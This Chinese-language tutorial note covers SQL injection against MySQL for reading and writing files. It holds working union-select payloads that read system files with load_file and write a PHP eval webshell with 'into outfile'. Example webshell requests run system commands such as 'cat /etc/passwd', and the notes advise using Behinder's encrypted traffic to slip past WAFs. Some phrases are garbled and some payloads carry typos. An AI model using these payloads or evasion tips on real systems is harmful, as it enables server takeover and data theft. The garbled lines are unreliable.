阅读量: 507
| show global variables like '%secure%'; |
| |
| secure_file_priv = 空 的时候,任意读写 |
| secure_file_priv = 某个路径的时候,只能在规定的路径下读写 |
| secure_file_priv = NULL 不能读写 |
- 利用 SQL 语句读取系统文件,先读取常规文件(明确路径),如果能成功读取,则继续读取其他文件;如果明确知道路径,则尝试爆破路径下的文件;如果不知道路径,则爆破路径。
| -1' union select 1,2,3,load_file("c:/windows/service.inf"),5,6 |
| |
| -1' union select 1,2,3,load_file("D:/XamppNew/htdics/security/commin.php"),5,6 |
| 例如:select "helloworld" into outfile "/opt/lampp/htdocs/security/muma.php" |
| |
| -1 union select 1,2,3,4,5,"<?php eval($_GET['a']);?>" intooutfile "D:/XamppNew/htdocs/security/temp/muma.php" |
| |
| 如果列数未知,也可以不停尝试,注入一次,访问一次,确认是否注入成功 |
| |
| 一句话木马: |
| <?php eval($_POST['a']);?> |
| eval可以将一段字符串当成代码来执行,如果用户可以直接 将这段有效的PHP代码传入后台,则可以执行任意代码或指令 |
| |
| /security/temp/muma/php?a=phpinfo(); |
| /security/temp/muma/php?a=echo date('Y-m-d'); |
| /security/temp/muma/php?a=system('ip addr'); |
| /security/temp/muma/php?a=system('cat /etc/passwd'); |
| |
| 以上为GET请求的方式,也可以用POST请求的方式,这样可以添加的载荷更大,可以上传大马,但建议通过curl下载的方式植入大马 |
| -1 union select 1,2,3,4,5,"<?php eval($_POST['a']);?>" intooutfile "D:/XamppNew/htdocs/security/temp/muma.php" |
| |
| 也可以上传一句话木马后,通过中国菜刀连接以便于操作 |
- 必须提前已经我去南城了木马植入然后才能使用。
- 木马必须是 POST 请求,参数自定义,在菜刀中给出正确的参数名。
- 菜刀采用 Base64 编码,相当于明文传输,目前已经被 WAF 进行防护了
- 冰蝎是加密传输,防火墙很难分析出流量特征,比较容易绕开防火墙
- 先上传一个冰蝎自己的带加密解密功能的 shell 脚本
- 上传 shell 的过程有以下方式
- 直接在命令行运行命令按行用 echo 写入
- 用 curl 通过公网进行远程文件下载
- 用菜刀连接,然后基于菜刀直接上传 shell
- 如果目标站点存在文件上传漏洞,直接在文件上传的时候上传 shell